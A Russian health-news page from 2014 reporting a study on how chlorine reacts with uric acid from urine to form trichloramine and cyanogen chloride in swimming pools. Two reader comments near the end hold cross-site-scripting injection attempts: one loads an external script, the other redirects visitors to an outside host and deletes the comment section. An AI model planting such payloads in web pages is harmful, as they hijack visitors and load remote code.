Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Вопрос, который мучает вс...  >>  Вопрос, который мучает всех отдыхающих: можно ли писать в бассейн?
 
Обратная связь
 

Вопрос, который мучает всех отдыхающих: можно ли писать в бассейн?

Размер шрифта
05 августа 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Каждый, кто хоть раз плавал в бассейне, наверняка задавался вопросом – а можно ли туда писать. И хоть решение в этом случае остается за вами, все же стоит прислушаться к мнению ученых – они установили, что такое поведение может оказаться опасным для вашего здоровья и здоровья окружающих.

Вопрос, который мучает всех отдыхающих: можно ли писать в бассейн??

Все «борцы за санитарию», которые отстаивают свой лозунг «писать в бассейне нельзя», теперь имеют научные данные для обоснования своих опасений. И это несмотря на многочисленные чистосердечные признания от обычных любителей поплавать и даже профессиональных пловцов в совершении подобных грешков. Ученые заявляют, что при смешивании мочи и хлорированной воды образуются вещества, которые могут вызывать проблемы со здоровьем. Статья на эту тему недавно была опубликована в журнале Environmental Science & Technology.

Джинг Ли, Эрнест Блэтчли вместе с коллегами подтверждают, что добавление хлора в воду бассейнов – самый распространенный способ борьбы с болезнетворными бактериями и защиты пловцов от различных заболеваний. Однако когда люди плавают, брызгаются, играют и одновременно с этим писают в бассейн, хлор смешивается с потом и мочой с образованием новых химических веществ. Двое из этих веществ – трихлорамин (NCl3) и цианоген хлорид (CNCl), повсеместно встречаются в плавательных бассейнах. Первое из них связано с возникновением проблем с легкими, второе аналогично может вести к повреждению легких, а также сердца и центральной нервной системы. Но до сих пор ученым не удалось точно обнаружить, из каких именно составляющих пота и мочи образуются эти потенциально опасные химикаты. Поэтому доктор Ли с коллегами решили проверить, как хлор взаимодействует с мочевой кислотой, которая содержится в моче и поте.

Они смешали мочевую кислоту с хлором и через час обнаружили образование и трихлорамина, и цианоген хлорида. Хотя некоторое количество мочевой кислоты попадает в воду из пота, было подсчитано, что более 90% ее в воде бассейнов происходит именно из мочи.

В целом можно сделать вывод: чтобы сделать окружающую среду, а в частности воду бассейнов, чище и безопаснее для здоровья, нужно просто писать не в бассейн, а в специально созданные для этого места – в туалеты.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

05 августа 2014 в 11:47

Цитировать   |   Пожаловаться

"Каждый, кто хоть раз плавал в бассейне, наверняка задавался вопросом – а можно ли туда писать."

Странное умозаключение, по себе судите? Никогда мне такое в голову не приходило!!!

2 - zzzzzz

30 июня 2015 в 18:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:31

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как не умереть в бассейне   Все что надо знать о бронхите   Ученые выяснили, что случится с вами, если вас удалят из друзей Вконтакте!   Вся правда о соплях  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Странные сигналы вашего организма
Как снова хотеть секса
Проблемы с внешностью или болезнь?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.